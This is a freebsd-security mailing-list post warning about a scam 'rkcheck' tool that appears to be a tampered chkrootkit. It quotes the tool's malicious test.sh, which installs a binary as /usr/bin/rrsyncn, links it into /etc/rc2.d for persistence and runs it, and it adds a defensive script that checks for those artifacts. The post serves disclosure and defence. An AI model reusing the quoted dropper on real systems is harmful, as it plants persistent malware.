has my 10.1-RELEASE system been compromised

Joseph Mingrone jrm at ftfl.ca
Wed Feb 25 20:41:26 UTC 2015


Philip Jocks <pjlists at netzkommune.com> writes:
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which
> was registered a few days ago and looks like a tampered version of chkrootkit. I
> hope nobody installed it anywhere; it seems to execute
> rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...

I downloaded it as well, but also became suspicious (for a variety of
reasons) and didn't run it.  Fortunately /bin/bash doesn't exist on our
systems.

Some evidence to confirm or refute the authenticity of the email
reporting our IPs as vulnerable would be helpful.

Joseph
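For anyone who did run the downloaded script, the following is an added check (not code from this thread or from rkcheck) that looks for the artifacts the quoted test.sh would leave behind. It takes an optional root prefix so a mounted backup or filesystem image can be inspected instead of the live host; the paths are the ones in the quoted script, and the process name "rrsyncn" is assumed from the binary name /usr/bin/rrsyncn.

```shell
#!/bin/sh
# Added example: detect the artifacts left by the quoted test.sh.
# Usage: check_rkcheck_artifacts [ROOT]   (ROOT defaults to the live host, /)
# Exit status 0 = nothing found, 1 = at least one artifact found.

check_rkcheck_artifacts() {
    root="${1%/}"          # "" for the live host, or e.g. /mnt/image
    found=0

    # Dropped binary and the SysV-style rc symlink from the quoted script.
    # /etc/rc2.d is not a FreeBSD path at all, so on a FreeBSD box its mere
    # presence deserves a look.  -L catches a dangling symlink that -e misses.
    for p in "$root/usr/bin/rrsyncn" "$root/etc/rc2.d/S98rsyncn"; do
        if [ -e "$p" ] || [ -L "$p" ]; then
            echo "FOUND: $p"
            [ -L "$p" ] && echo "  symlink -> $(readlink "$p")"
            found=1
        fi
    done

    # Running process (name assumed from the binary name): only meaningful
    # on the live host, i.e. when no root prefix was given.
    if [ -z "$root" ] && command -v ps >/dev/null 2>&1; then
        if ps -Ao comm 2>/dev/null | grep -qx 'rrsyncn'; then
            echo "FOUND: rrsyncn process running"
            found=1
        fi
    fi

    [ "$found" -eq 0 ] && echo "clean: no rkcheck artifacts under '${root:-/}'"
    return "$found"
}

check_rkcheck_artifacts "$@"
```

Removing the files is not a cleanup: the dropped binary was already executed once by the script, so a host where this reports anything should be treated as compromised and rebuilt.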


More information about the freebsd-security mailing list